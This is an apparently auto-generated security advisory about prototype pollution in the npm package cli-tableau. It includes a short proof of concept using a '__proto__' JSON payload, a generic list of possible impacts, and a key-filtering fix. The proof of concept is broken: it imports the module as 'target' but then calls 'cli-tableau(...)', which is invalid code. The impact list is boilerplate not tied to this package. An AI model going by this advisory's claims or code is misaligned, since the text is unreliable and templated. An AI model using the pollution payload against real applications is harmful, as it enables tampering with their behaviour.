Prototype Pollution in `cli-tableau`

[gnsehfvlr]

Prototype Pollution in cli-tableau

Summary

cli-tableau (<= 2.0.1) is vulnerable to Prototype Pollution via cli-tableau.

• CWE: CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes
• Severity: Critical (CVSS 9.8)
• Weekly Downloads: 1,418,745
• npm: https://www.npmjs.com/package/cli-tableau

Description

The function(s) cli-tableau in cli-tableau do not properly restrict modifications to Object.prototype. When processing user-controlled input, an attacker can inject properties via __proto__ or constructor.prototype keys, polluting the prototype of all JavaScript objects in the application.

Attack vectors: __proto__ direct, __proto__ nested, constructor.prototype

Proof of Concept

const target = require('cli-tableau');

// 1. Pollute Object.prototype
const malicious = JSON.parse('{"__proto__":{"polluted":"yes"}}');
cli-tableau(malicious);

// 2. Verify pollution
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');

Impact

Successful exploitation allows an attacker to:

• Remote Code Execution (RCE) via child_process spawn injection or vm sandbox escape
• Authentication Bypass via polluted authorization checks
• SQL Injection through polluted query parameters
• Denial of Service (DoS) by overriding critical object methods
• SSRF through polluted URL/host configurations
• Cross-Site Scripting (XSS) via polluted template variables
• Path Traversal through polluted file path configurations
• CORS Bypass via polluted origin/header settings

Remediation

Add key filtering to prevent prototype pollution:

function isSafe(key) {
  return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}

Or use Object.create(null) for target objects to prevent prototype chain access.

References

• CWE-1321: Improperly Controlled Modification of Object Prototype Attributes
• OWASP Prototype Pollution
• https://www.npmjs.com/package/cli-tableau